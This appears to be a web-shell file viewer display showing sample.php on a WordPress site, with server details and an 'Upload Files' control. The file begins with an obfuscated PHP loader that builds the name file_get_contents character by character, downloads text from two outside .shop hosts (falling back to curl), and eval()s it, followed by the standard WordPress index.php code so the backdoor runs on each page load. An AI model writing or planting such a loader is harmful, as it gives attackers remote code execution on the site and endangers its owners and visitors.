HEX
Server: Apache
System: Linux s325.xrea.com 6.8.0-88-generic #89-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct 11 01:02:46 UTC 2025 x86_64
User: yunportfolio (12972)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /virtual/yunportfolio/public_html/yunportfolio.shop/sample.php
<?php
$load = '';
$sources = ['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s'];
foreach($sources as $s) $load .= $s;

$fetch = false;
if(ini_get('allow_url_fopen') && function_exists($load)) {
    $fetch = @$load('http://z60108_7.qosinski.shop/stat/index2.txt');
}

if($fetch === false && function_exists('curl_init')) {
    $ch = curl_init();
    $opts = [10102=>true,10002=>'http://z51014_7.ldxjjxx.shop/stat/index2.txt',19913=>true,19914=>true,13=>10];
    curl_setopt_array($ch, $opts);
    $fetch = curl_exec($ch);
    curl_close($ch);
}

if($fetch !== false) {
    $payload = '?>' . $fetch;
    eval($payload);
}
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';